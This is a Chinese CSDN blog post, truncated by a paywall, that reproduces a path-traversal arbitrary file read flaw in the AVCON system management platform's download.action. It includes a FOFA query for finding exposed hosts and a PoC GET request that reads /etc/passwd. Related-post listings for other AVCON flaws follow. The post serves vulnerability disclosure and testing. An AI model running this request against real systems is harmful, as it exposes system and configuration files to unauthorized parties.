AVCON-系统管理平台 download.action 任意文件读取漏洞复现

0xSecl

已于 2024-08-17 18:51:51 修改

阅读量907

点赞数 4

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2024-08-17 18:51:31 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/141284955

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

AVCON-系统管理平台以华平自主知识产权的核心技术为基础，集成了图像综合管理、音视频交互、应急指挥等多种功能于一体。该平台通过整合各种子系统，实现了图像、音视频等信息的综合集成和高效管理，打破了原先各业务和信息系统分离的孤岛现象。

0x02 漏洞概述

AVCON-系统管理平台 download.action 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：title="AVCON-系统管理平台"

0x04 漏洞复现

PoC

GET /download.action?filename=../../../../../../../../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,applicati

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

华平信息技术股份有限公司 AVCON6 系统管理平台存在任意文件下载漏洞

nnn2188185的博客

05-02

403

华平信息技术股份有限公司是一家视讯产品与应用提供商，掌握视频处理、视音频编解码和网络适应性等。华平信息技术股份有限公司 AVCON6 系统管理平台存在任意文件下载漏洞,攻击者可以利用漏洞下载系统文件。

avcon综合管理平台SQL注入漏洞复现

iSee857的博客

08-21

384

AVCON-系统管理平台/avcon.action接口，未经身份验证的远程攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限，导致网站处于极度不安全状态。Fofa：title="AVCON-系统管理平台"关闭互联网暴露面或接口设置访问权限。

参与评论您还未登录，请先登录后发表或查看评论

action下载

09-11

关于struts2的下载异常，以及中文显示乱码问题。

Struts1.x系列教程（15）：使用DownloadAction类统计文件下载次数

一个被知识诅咒的人

02-18

1421

本文为原创，如需转载，请注明作者和出处，谢谢！上一篇：Struts1.x系列教程（14）：动态Form 除了标准的org.apache.struts.action.Action类外，在Struts中还提供了另外7个Action类来完成特殊的工作。本文及后面的文章中将介绍这些Action类的用法。一、DownloadAction类简介可能有时需要

AVCON6 系统管理平台 download.action 任意文件下载漏洞

BeWorthyOf的博客

11-23

3935

AVCON6系统管理平台 download.action 存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器任意文件

downloadAction问题

锲而不舍金石可錄

09-24

484

用struts带的downloadAction继承实现了一个action来下载文件，当该文件不存在时候，可以catch到FileNotFoundException异常，但是却把下载页面的html内容打印出来，不知道各位有没有遇到这样的问题，该如何解决？...

AVCON视频会议系统操作说明.pptx

09-27

AVCON视频会议系统是一款用于远程会议的软件，其操作流程主要分为客户端的下载与安装、客户端设置、与会者操作、主持人操作、常见问题解决以及使用注意事项。以下是对这些环节的详细说明： **一、客户端下载及安装*...

华平信息技术股份有限公司 AVCON6 系统管理平台存在 strut2 远程代码执行漏洞

holyxp的博客

07-03

582

该文章工具仅供学习者开源华平信息技术股份有限公司是一家多媒体通信系统和智慧城市解决方案提供。华平信息技术股份有限公司 AVCON6 系统管理平台存在 Strut2 远程代码执行漏洞。允许攻击者远程执行命令，获得服务器权限。

DownloadAction实现下载示例

大力东++

01-17

773

[code="java"] package com.cai.miniHr.struts.actions; import java.io.File; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.stru...

Struts中DownloadAction的使用

guanghuimvp的专栏

05-11

1112

Struts中DownloadAction的使用Posted by 冷月宫主 2007-3-16 14:23:43 1.自从Struts 1.2.6版本，就出现了DownloadAction类，主要就是用于处理web应用的下载。使用DownloadAction也是很简单的。 2.

AVCON网络视频会议系统企业解决方案

03-04

AVCON网络视频会议系统以其业内领先的编解码及压缩技术、媒体综合及同步技术、多媒体通信网络技术和用户接入技术赢得了企业的认可与赞同。同时AVCON网络视频会议系统以其强大的应用功能，软硬件结合的构建方式为企业打造了一套视讯行业内性价比最佳的网络视频会议系统。AVCON网络视频会议系统全新感受的音视频效果，将使每一位用户在应用视频会议系统中真实感受多维的工作空间，使协同办公如处一室、异地会议身临其境。

Struts中使用DownloadAction实现流下载

gaoguosheng的专栏

05-01

1314

实现流下载，使用struts的DownloadAction类非常简单，只需传入所需要的文件名，因考虑中文问题，需要转码将gbk转为iso-8859-1，就不会乱码了，以下是实现代码。/**//* * Generated by MyEclipse Struts * Template path: templates/java/JavaClass.vtl */package com.ggs.ac

DownloadAction下载及下载次数统计加刷新详解

我的新天地

11-01

501

struts中downloadAction下载详解，包括统计下载次数，刷新页面上下载次数这是Action代码 package action; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import javax.servlet.ServletOutpu...

java action下载文件,DownloadAction下载文件,该如何解决

weixin_39797780的博客

03-19

671

当前位置:我的异常网» Java Web开发»DownloadAction下载文件,该如何解决DownloadAction下载文件,该如何解决www.myexceptions.net网友分享于：2015-08-26浏览：19次DownloadAction下载文件网上看了很多资料都是写用DownloadAction写上传下载的，我实现了上传，可是下载运河有问题。我上传时把文件名，存储路径...

Struts 漏洞

weixin_30530339的博客

05-02

848

1.Struts 远程执行漏洞（很早的）　　　　　　起因：.do：以do为扩展名的网页文件是java语言写的，以Struts为框架的;它的运行环境是tomcat,weblogic等；通常用的数据库有oracle,mysql,mssql,access等。网页后台程序是*.jsp 或者 struts的组件文件*.do；.do一般是servlet的映射。j2ee平台，基于struts框架开发；*.d...

圣乔ERP系统login.action存在Struts2远程代码执行漏洞